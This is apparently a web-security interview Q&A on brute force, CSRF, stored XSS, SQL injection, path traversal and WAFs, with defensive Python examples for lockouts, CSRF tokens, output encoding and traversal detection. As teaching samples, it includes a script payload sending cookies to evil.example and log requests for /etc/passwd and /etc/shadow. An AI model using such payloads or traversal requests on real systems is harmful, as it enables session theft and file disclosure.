1. What is a brute force attack and how can the risk of these attacks be mitigated? A brute force attack is a cryptanalytic attack that simply tries every possible key or password until one works. It can in principle be used against any encrypted data or any login form; the only thing that limits it is the time and computing power the attacker is willing to spend, so it is never "fixed", only made impractical. The risk is reduced by choosing suitable passwords (long and unpredictable, so the search space is too large to cover), by putting in place lockouts or rate limits that restrict access after x failed login attempts, and by monitoring logs for bursts of failed logins against one account or from one address.
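The lockout mitigation described above, as an added example that is not part of the original page: a small login guard that counts failed attempts per account and refuses further logins for a fixed period once the threshold is reached. The user store, the five-attempt/fifteen-minute policy, the PBKDF2 password hashing and the injectable clock are all assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets
import time

# Hypothetical policy: lock an account after 5 failures for 15 minutes.
MAX_FAILURES = 5
LOCKOUT_SECONDS = 900


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 is used here only to keep the example dependency-free;
    # a real deployment would use argon2id or bcrypt.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed credential store: username -> (salt, password hash).
_SALT = secrets.token_bytes(16)
USERS = {"alice": (_SALT, _hash_password("correct horse battery staple", _SALT))}


class LoginGuard:
    """Tracks failed attempts per account and refuses logins while locked."""

    def __init__(self, now=time.time):
        self._now = now                 # injectable clock so the lockout can be tested
        self._failures = {}             # username -> consecutive failure count
        self._locked_until = {}         # username -> timestamp when the lock expires

    def is_locked(self, username: str) -> bool:
        until = self._locked_until.get(username)
        if until is None:
            return False
        if self._now() >= until:        # lock has expired: clear it and the counter
            del self._locked_until[username]
            self._failures.pop(username, None)
            return False
        return True

    def login(self, username: str, password: str) -> str:
        """Returns 'ok', 'bad-credentials' or 'locked'."""
        if self.is_locked(username):
            return "locked"             # refuse even a correct password while locked
        record = USERS.get(username)
        # Always hash, even for unknown users, so timing does not reveal valid names.
        salt, expected = record if record else (b"\0" * 16, b"\0" * 32)
        digest = _hash_password(password, salt)
        ok = record is not None and hmac.compare_digest(digest, expected)
        if ok:
            self._failures.pop(username, None)
            return "ok"
        count = self._failures.get(username, 0) + 1
        self._failures[username] = count
        if count >= MAX_FAILURES:
            self._locked_until[username] = self._now() + LOCKOUT_SECONDS
            return "locked"
        return "bad-credentials"


if __name__ == "__main__":
    guard = LoginGuard()
    for attempt in range(6):
        print(attempt + 1, guard.login("alice", "password123"))
    print("correct password while locked:", guard.login("alice", "correct horse battery staple"))
```

A fixed lockout has a cost: an attacker who knows a username can deliberately lock the legitimate user out, so many deployments prefer a growing delay between attempts or per-source rate limiting, and keep the hard lockout for the highest-value accounts.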
2. Explain a scenario where a hacker may use Cross Site Request Forgery (CSRF) to perform unauthorized transactions. The victim is logged in to a site such as their online bank, so their browser holds a valid session cookie for it. While still logged in, the victim visits a site the attacker controls, such as a bad movie upload page or a smut website. That page contains a hidden form or image tag that sends a request to the bank, for example a funds transfer to the attacker's account. The browser attaches the victim's session cookie to that request automatically, so the bank cannot tell the forged request from one the victim made themselves and carries out the transaction as if the victim had authorized it.
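The scenario above in code, as an added example that is not part of the original page: a transfer handler that trusts the session cookie alone, next to one that also demands a token bound to the session, which the attacker's page cannot know or compute. The session and form dictionaries, the server secret and the transfer endpoint are constructed for the demonstration and stand in for a real web framework.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret; never exposed to the browser.
SECRET_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Token derived from the victim's session id; only the server can compute it.

    The legitimate transfer form embeds this token as a hidden field. A page on
    another origin can make the browser send the cookie, but cannot read the
    bank's pages to learn the token, so its forged form arrives without it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(session: dict, form: dict) -> str:
    # Authenticates with the cookie-backed session only: a cross-site POST that
    # carries the victim's cookie looks exactly like the victim's own click.
    if session.get("user") is None:
        return "401 not logged in"
    return f"transferred {form['amount']} to {form['to']} from {session['user']}"


def transfer_protected(session: dict, form: dict) -> str:
    if session.get("user") is None:
        return "401 not logged in"
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied, csrf_token(session["id"])):
        return "403 bad csrf token"
    return f"transferred {form['amount']} to {form['to']} from {session['user']}"


if __name__ == "__main__":
    # Constructed victim session, as the bank would load it from the cookie.
    victim = {"id": "sess-1234", "user": "victim"}
    # Constructed request from a hidden, auto-submitted form on the attacker's site.
    forged = {"to": "attacker", "amount": "1000"}
    print("vulnerable:", transfer_vulnerable(victim, forged))
    print("protected: ", transfer_protected(victim, forged))
    legit = dict(forged, to="landlord", csrf_token=csrf_token(victim["id"]))
    print("legit form:", transfer_protected(victim, legit))
```

Marking the session cookie SameSite=Lax or Strict is a second, independent defence: the browser then omits the cookie from cross-site form posts altogether, so even the vulnerable handler sees an unauthenticated request.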
3. What is the proper way to prevent an XSS attack?
4. If an attacker wishes to place a phishing page on a website, what is a common vulnerability that can be exploited to successfully do this? The attacker needs some way of writing their own content to the target site, and a common one is an unrestricted file upload: an upload feature that accepts HTML or script files and serves them back from the site's own domain, so the phishing page carries the trusted site's name and certificate. Criminals then combine this with social engineering, and with vulnerabilities in applications such as web browsers or email clients, to lure users to the page and trick them into entering credentials or installing malicious code on their computer.
5. What can be the impact of a successful SQL injection?
A successful SQL injection exploit can read sensitive data from the database, bypass application logins, modify database data (INSERT/UPDATE/DELETE), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system.
6. What is the difference between a blind SQL injection attack and a normal SQL injection attack? The injection itself is the same; the only difference is the way the data is retrieved from the database. In a normal (in-band) injection the application echoes query results or database error messages back in its response, so the attacker reads the data directly. In a blind injection the application shows neither results nor errors, only an indirect signal: whether the page content changed (boolean-based) or how long the response took (time-based). The attacker therefore has to ask the database a series of yes/no questions and reconstruct the data one character at a time, which is slower but just as complete.
7. Why are stored XSS vulnerabilities a major risk for web applications? Cross-Site Scripting is a type of injection problem in which malicious scripts (VBScript, JavaScript etc.) are injected into a trusted web site. XSS flaws occur whenever an application takes untrusted (typically user supplied) data and sends it to a web browser without validating or encoding it. XSS allows attackers to execute script in the victim's browser, and the malicious script can access any cookies, session tokens, or other sensitive information the browser retains for that site; it can even rewrite the content of the HTML page. It exploits the trust that a client browser has in the website. Stored XSS is the most serious form because the payload is saved on the server (in a comment, profile field or message) and served to every user who later views that page: the attacker does not need to lure each victim to a crafted link, the attack persists until the data is cleaned up, and an administrator viewing the content is hit the same way as an ordinary user.
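The stored XSS described above, and the output-encoding defence that question 3 asks about, as an added example that is not part of the original page: a comment feature that concatenates saved text straight into HTML beside one that encodes for the HTML context, plus a link helper showing that encoding alone is not enough for an attribute such as href. The in-memory comment store, the page template and the sample payload are constructed for the demonstration; `html.escape` is Python's standard-library encoder.

```python
import html
from urllib.parse import urlsplit

# Constructed store standing in for the application's comments table.
COMMENTS = []


def post_comment(author: str, body: str) -> None:
    """Persists whatever the user submits, exactly as a vulnerable site would."""
    COMMENTS.append({"author": author, "body": body})


def render_comments_vulnerable() -> str:
    # Stored text is dropped straight into the markup, so a script saved once by
    # the attacker runs in the browser of every visitor who loads the page.
    return "".join(
        f"<div class='comment'><b>{c['author']}</b>: {c['body']}</div>" for c in COMMENTS
    )


def render_comments_safe() -> str:
    # Encode for the HTML text context at output time: < > & " ' become entities,
    # so the payload is displayed as text and never parsed as a tag.
    return "".join(
        f"<div class='comment'><b>{html.escape(c['author'])}</b>: "
        f"{html.escape(c['body'])}</div>"
        for c in COMMENTS
    )


def safe_href(url: str) -> str:
    """Encoding is context-specific: html.escape leaves 'javascript:alert(1)' intact,
    and inside an href the browser will happily run it. For a URL attribute the
    scheme must be allowlisted as well as the value encoded."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


if __name__ == "__main__":
    # Constructed payload: exfiltrates the session cookie to an attacker-run host.
    post_comment("mallory", "<script>new Image().src='https://evil.example/?c='+document.cookie</script>")
    post_comment("bob", "Nice post & thanks")
    print(render_comments_vulnerable())
    print(render_comments_safe())
    print(safe_href("javascript:alert(1)"), safe_href("https://example.com/?a=1&b=2"))
```

Encoding belongs at the point of output, not at the point of storage: the same stored comment may later be emitted into HTML, into a JSON API or into an email, and each context needs its own encoder.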
8. What would the following URL being queued in your web logs be an indication of: http://www.testurl.com/../../../../../../../etc/passwd? It would be an indication of a directory (path) traversal attempt: someone is using repeated ../ sequences to step out of the web root and read your server's password file. The status code logged with it matters: a 400 or 404 suggests the server refused or normalised the path, while a 200 means the file was actually served and the incident needs investigating.
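Detecting the pattern above in logs, and the server-side check that defeats it, as an added example that is not part of the original page. The access-log lines are constructed in Common Log Format and include URL-encoded and double-encoded variants, which is why the detector decodes repeatedly before looking for `../`; the document root used by `safe_join` is hypothetical.

```python
import os
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /../../../../../../../etc/passwd HTTP/1.1" 404 162',
    '198.51.100.9 - - [10/Oct/2023:13:55:38 +0000] "GET /download?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2301',
    '198.51.100.9 - - [10/Oct/2023:13:55:39 +0000] "GET /static/..%252f..%252fetc/shadow HTTP/1.1" 200 0',
    '192.0.2.5 - - [10/Oct/2023:13:55:40 +0000] "GET /docs/readme.txt HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_target(target: str) -> str:
    """URL-decode until stable (attackers double-encode) and fold \\ to /."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target.replace("\\", "/")


def is_traversal(target: str) -> bool:
    """True if the decoded path or query contains a parent-directory step."""
    return "../" in normalise_target(target)


def suspicious_requests(lines):
    """Returns (client ip, decoded target, status) for each traversal-looking request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and is_traversal(m["target"]):
            hits.append((m["ip"], normalise_target(m["target"]), int(m["status"])))
    return hits


def safe_join(root: str, requested: str):
    """Server-side defence: resolve the final path and refuse anything that
    lands outside the document root. Returns None for a rejected request."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    for ip, target, status in suspicious_requests(LOG_LINES):
        flag = "SERVED" if status == 200 else "blocked"
        print(f"{ip:14} {status} {flag:8} {target}")
    print(safe_join("/var/www", "../../etc/passwd"))   # None
    print(safe_join("/var/www", "docs/readme.txt"))
```

The detector works on the decoded form, so the `..%252f` line, which a naive `grep '\.\./'` would miss, is reported; in the sample the two requests that returned 200 are the ones to triage first.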
9. How would you ensure security between a web application and an SQL server? Use secure authentication, such as Windows (integrated) authentication, that does not send passwords over the network. If you must use SQL Server authentication, encrypt the credentials in transit; installing a server certificate on the database server lets SQL Server encrypt the login automatically. Secure the communication channel itself so that query traffic and result sets cannot be read or altered on the wire: options include SSL/TLS at the database connection or IPsec between the two hosts. Use remote procedure call (RPC) encryption with Enterprise Services applications, and use the HttpChannel with SSL for .NET Remoting. Finally, put the database on a segmented network with only the web tier allowed to reach it, which confines any eavesdropping to the compromised segment and keeps the database off the Internet-facing network entirely.
10. What is a benefit of using a web application firewall (WAF)? Application-layer attacks such as SQL injection and XSS can be stopped before they reach the web server, because the WAF inspects and filters HTTP traffic against known attack patterns. This provides a network infrastructure solution for what is really a software security problem, which is useful for shielding applications whose code cannot be fixed quickly (legacy or third-party software) and for buying time between the discovery of a flaw and its patch. It does not remove the need to secure the code: a WAF matches patterns and can be bypassed with encoding or unusual syntax, so it is best treated as a compensating control and an extra source of attack telemetry rather than a replacement for input validation and parameterised queries in the application.